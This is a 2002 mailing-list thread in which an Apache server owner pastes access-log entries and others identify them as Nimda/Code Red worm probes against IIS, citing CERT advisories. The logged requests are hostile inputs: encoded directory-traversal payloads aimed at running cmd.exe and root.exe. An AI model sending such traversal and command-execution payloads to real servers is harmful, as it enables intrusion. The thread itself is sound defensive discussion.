I found this in my httpd access log: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 Did someone try to break into my system? -- STH
On Wednesday 18 September 2002 00.13, Steven T. Hatton wrote:
Did someone try to break into my system?
Yep. Read this http://www.cert.org/advisories/CA-2001-26.html The nimda worm's greatest impact on an apache server is bigger log files, so you don't have to worry too much about it. //Anders
On Tuesday 17 September 2002 18:16, Anders Johansson wrote:
On Wednesday 18 September 2002 00.13, Steven T. Hatton wrote:
Did someone try to break into my system?
Yep. Read this
http://www.cert.org/advisories/CA-2001-26.html
The nimda worm's greatest impact on an apache server is bigger log files, so you don't have to worry too much about it.
//Anders
Thanks. I got hit by a few of these as well: http://www.cert.org/advisories/CA-2001-19.html I've only had the bloody server up for 20 hours! and it doesn't even have a DNS entry. -- STH
On Tue, 17 Sep 2002, Steven T. Hatton wrote:
I found this in my httpd access log: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 [snip] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
Did someone try to break into my system?
Yes, it IS an attempt to break in, but to a Windows NT or IIS server, and it is from an infected Windows server, not a rootkit type of exploit. Apache is not vulnerable to these attacks, known as "code red" -- there may be other names for it as well, by now there may be variants of the original worm. Jim
participants (3)
-
Anders Johansson -
Jim Cunning -
Steven T. Hatton